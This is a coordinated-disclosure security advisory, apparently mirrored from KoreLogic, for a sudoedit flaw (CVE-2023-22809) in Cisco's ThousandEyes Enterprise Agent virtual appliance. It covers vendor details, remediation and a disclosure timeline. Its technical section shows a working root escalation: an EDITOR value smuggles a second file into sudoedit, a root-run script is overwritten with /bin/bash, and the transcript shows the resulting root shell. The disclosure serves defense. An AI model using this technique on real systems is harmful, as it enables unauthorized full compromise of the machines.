## https://sploitus.com/exploit?id=1337DAY-ID-38980
Title: Cisco ThousandEyes Enterprise Agent Virtual Appliance Arbitrary File Modification via sudoedit
Advisory ID: KL-001-2023-003
Publication Date: 2023.08.17
Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2023-003.txt
1. Vulnerability Details
Affected Vendor: ThousandEyes
Affected Product: ThousandEyes Enterprise Agent Virtual Appliance
Affected Version: thousandeyes-va-64-18.04 0.218
Platform: Linux / Ubuntu 18.04
CWE Classification: CWE-1395: Dependency on Vulnerable
Third-Party Component
CVE ID: CVE-2023-22809
2. Vulnerability Description
An unpatched vulnerability in 'sudoedit', allowed by sudo
configuration, permits a low-privilege user to modify arbitrary
files as root and subsequently execute arbitrary commands as
root.
3. Technical Description
The ThousandEyes Virtual Appliance is distributed with
a restrictive set of commands that can be executed via
sudo, without having to provide the password for the
'thousandeyes' account. However, the ability to execute
sudoedit of a specific file (/etc/hosts) via sudo is permitted
without requiring the password. The sudoedit binary can
be abused to allow the modification of any file on the
filesystem. This is a known security vulnerability (per
https://seclists.org/oss-sec/2023/q1/42), but had not been
disclosed for the ThousandEyes Virtual Appliance. This can be
abused to allow root-level compromise of the virtual appliance.
thousandeyes@thousandeyes-va:~$ id
uid=1000(thousandeyes) gid=1000(thousandeyes)
groups=1000(thousandeyes),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),109(sambashare)
thousandeyes@thousandeyes-va:~$ sudo -l
Matching Defaults entries for thousandeyes on thousandeyes-va:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User thousandeyes may run the following commands on thousandeyes-va:
(ALL : ALL) ALL
(ALL) NOPASSWD: /bin/systemctl start te-va, /bin/systemctl stop te-va, /bin/systemctl restart te-va,
/bin/systemctl status te-va, /bin/systemctl start te-agent, /bin/systemctl stop
te-agent, /bin/systemctl restart te-agent, /bin/systemctl status te-agent, /bin/systemctl start
te-browserbot, /bin/systemctl stop te-browserbot, /bin/systemctl restart
te-browserbot, /bin/systemctl status te-browserbot, /sbin/reboot, sudoedit /etc/hosts, /usr/bin/dig,
/usr/bin/lsof, /usr/bin/apt-get update, /usr/bin/apt-get install te-agent,
/usr/bin/apt-get install te-browserbot, /usr/bin/apt-get install te-va, /usr/bin/apt-get install te-pa,
/usr/bin/apt-get install te-va-unlock, /usr/bin/apt-get install
te-intl-fonts, /usr/bin/apt-get install te-agent-utils, /usr/bin/apt-get install ntpdate,
/usr/bin/apt-cache, /usr/bin/te-*, /usr/local/bin/te-*, /usr/local/sbin/te-*
(root) NOPASSWD: /usr/sbin/ntpdate, /usr/sbin/traceroute, /usr/sbin/tcpdump
Here we see that /usr/local/bin/te-* are executable as root with no
password. Even though sudoedit is only permitted to edit /etc/hosts,
we can use EDITOR= to spawn vim to edit an arbitrary file. Pick one
of those scripts because we can then execute it:
thousandeyes@thousandeyes-va:~$ file /usr/local/bin/te-set-config
/usr/local/bin/te-set-config: Python script, ASCII text executable
thousandeyes@thousandeyes-va:~$ EDITOR='vim -- /usr/local/bin/te-set-config' sudoedit /etc/hosts
sudoedit: --: editing files in a writable directory is not permitted
2 files to edit
sudoedit: /etc/hosts unchanged
thousandeyes@thousandeyes-va:~$ file /usr/local/bin/te-set-config
/usr/local/bin/te-set-config: ASCII text
thousandeyes@thousandeyes-va:~$ cat /usr/local/bin/te-set-config
/bin/bash
thousandeyes@thousandeyes-va:~$ sudo /usr/local/bin/te-set-config
root@thousandeyes-va:~# id
uid=0(root) gid=0(root) groups=0(root)
root@thousandeyes-va:~#
4. Mitigation and Remediation Recommendation
The vendor has released a version which remediates the described
vulnerability. Release notes are available at:
https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwf18994
5. Credit
This vulnerability was discovered by Jim Becher of
KoreLogic, Inc.
6. Disclosure Timeline
2023.04.26 - KoreLogic submits vulnerability details to Cisco.
2023.04.26 - Cisco acknowledges receipt and the intention to
investigate.
2023.05.04 - Cisco notifies KoreLogic that a remediation for this
vulnerability is expected to be available within
90 days.
2023.06.30 - 45 business days have elapsed since KoreLogic reported
this vulnerability to the vendor.
2023.07.11 - Cisco informs KoreLogic that the issue has been
remediated in the latest ThousandEyes Virtual
Appliance and a Third Party Software Release Note
Enclosure will be released 2023.08.16. Cisco
provides CVE-2023-22809 to track this vulnerability.
2023.07.24 - 60 business days have elapsed since KoreLogic reported
this vulnerability to the vendor.
2023.08.16 - Cisco public acknowledgement.
2023.08.17 - KoreLogic public disclosure.
7. Proof of Concept
See 3. Technical Description.
The contents of this advisory are copyright(c) 2023
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/